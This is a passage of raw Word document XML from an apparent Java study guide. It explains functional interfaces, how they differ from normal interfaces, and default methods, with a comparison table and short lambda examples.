          <w:ilvl w:val="0"/>
          <w:numId w:val="9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allows you to create </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that fit your specific needs. This flexibility allows you to create clean and maintainable code without relying on predefined functional interfaces like Runnable or Callable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D214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Why We Need Functional Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2242744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Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide more concise and expressive code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A73158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s Code Readability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by allowing behavior to be passed as parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D475D"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Functional Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> paradigms, such as immutability and statelessness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04778F88"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s Code Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and flexibility by allowing you to pass around behavior as data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA1896"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ks seamlessly with the Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to write more declarative and functional-style code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591E3DEF"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by removing the need for anonymous classes in many cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783AD50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40AB01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crucial to making Java a more powerful, expressive, and functional language. They allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clean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re flexi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de by leverag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supporting </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F11858" w14:textId="22A6A948"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3170B191" w14:textId="13BE6305" w:rsidR="001B09AC" w:rsidRPr="00CE4B95" w:rsidRDefault="001B09AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="_Toc197867441"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between normal interface and Functional Interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w14:paraId="5723443A" w14:textId="05EA6789" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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 differences between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nd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are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD56F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bstract Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FDF8CD"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 normal interface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including none). It does not have any restrictions on the number of abstract methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453EBDCB"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This is the key feature that distinguishes a functional interface from a normal interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1303EF1D"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8E143"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1EE683E2"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NormalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E45F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17AE54B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2();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F5D2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8E75FA"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7E50C42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B82A9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5EA77B6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A35B7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C2BDE7"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urpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC299A"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It is used to define a contract for classes that implement it, providing multiple methods that the implementing class must override.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4B4E3"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is specifically designed to be used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A functional interface can be treated as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-class function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C4E4A"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notation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C46752"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does not need to have any special annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC60A0"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56A6D6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3EF4703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4282FA9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ingleMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3C38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FFE72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thods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F52D0D4"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and can also hav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since Java 8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372227D0"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but can also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 The abstract method is what the lambda expression will implement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E256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age:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD241A"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Normal interfaces are used to define a collection of related methods that implementing classes must provide concrete implementations for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEECAD1"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Functional interfaces are used to define single-method interfaces, which can be implemented us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method references, or anonymous classes. These interfaces are often used as arguments for methods that accept behavior (like Comparator, Runnable, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E797C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heritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B7988B"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can extend multiple interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E63FD1C"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can extend multiple interfaces </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the parent interfaces contain only one abstract method each, otherwise it violates the functional interface rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF21B9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F19A34F"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259AE8A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42DC88D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217B6E96"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E44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A07AE6"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1797935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CFD070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0203E39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6A3E492E"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8A4E30"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Lambda Expression Compatibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE68E89"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You cannot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with a normal interface unless it has exactly one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF6E46E"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You can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to implement the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A60E7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ambda):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44853E59"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 (cannot be used with lambda)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B5BDD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453FBA7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1();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E1424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34B81F2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8F8C43"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 (can be used with lambda)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C04943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6B6224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444E992C"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165705A1"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FA065" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7239114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259327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F2500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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F60BD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 func = () -&gt; System.out.println("Executing the method!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E31206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nc.execute();  // Output: Executing the method!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB421F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8732A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F2688"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0B872">
          <v:rect id="_x0000_i1681" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565FE8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3082"/>
        <w:gridCol w:w="5043"/>
      </w:tblGrid>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="11E1E671" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34E27A0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F712BF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rmal Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B0D4D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531F03" w:rsidRPr="00CE4B95" w14:paraId="2DA73754" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2252489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Abstract Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49B7333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abstract methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="143418C7"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="08CFBCCB" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03024B5D"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A11EAF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 any annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C6F670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is optional but recommended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="0D08D079" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248A72D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6E656E2F"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4441027A"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r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, but only </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one abstract method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="3CC14D9C" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="263276B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 Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7902271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compatible</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with lambda expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62A3B0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le</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with lambda expressions and method references</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="4304C9C0" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ECB1D8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139C02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contracts with multiple methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F8D83C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single-method interfaces often passed as behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="290FE9AF" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29BC928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424E45B2"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FD492C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 but only if they each have one abstract method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="4DF27C53" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6284AF0C"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73C3C59"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a contract for implementing classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE3E5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nded to be used with lambda expressions for functional programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A985A2F"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0F929">
          <v:rect id="_x0000_i1682" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8BBB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CD5C12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 special type of interface with exactly one abstract method, and it is meant to be used in conjunction with lambda expressions or method references.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can have multiple abstract methods and is used to define more general contracts for implementing classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4872B" w14:textId="5A7E790D"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83" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E9221E"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8" w:name="_Toc197867442"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default method in functional interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="228"/>
    </w:p>
    <w:p w14:paraId="56F8A0BA" w14:textId="661F8C63" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B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that is provided with a default implementation. This feature was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Default methods allow developers to add new methods to interfaces without breaking the existing implementation of classes that already implement the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3AD3DE"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 in Functional Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADEAC6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xml:space="preserve">: Default methods can have a body, meaning they can provide a </w:t>
      </w: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is allows you to add methods to an interface while ensuring that existing classes that implement the interface don't need to modify their code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B882969"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tax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods are defined using the default keyword in the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A953A6"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Even though functional interfaces are expected to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y can still ha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 presence of default methods does not violate the functional interface rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FACB1D"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Overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods can be overridden by the implementing class if needed, but if not overridden, the default implementation from the interface will be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F002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ultiple Default Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: An interface can have </w:t>
      </w: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but still, it can have on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for it to remain a valid functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C51389"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38B39E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F39F3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alculator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D46A8C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must be implemented by the implementing class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC61EE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0D9C75BD" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465D83C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0C94C13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subtract(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4E14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9031E2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A8DBAB" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3400019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nother default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4AE3B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multiply(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770EAAB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8B8E49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270752"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5095AD" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8AF3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lculatorTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA1C8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9D19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implementing the abstract method 'add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD814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ulator = (a, b) -&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4D436" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193DF28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add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788E573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 + calculator.add(5, 3)); // Output: Sum: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4FD4D" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4566337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subtract'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD204F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ifference: " + calculator.subtract(5, 3)); // Output: Difference: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20149D25" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51DD573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multiply'</w:t>
      </w:r>
    </w:p>
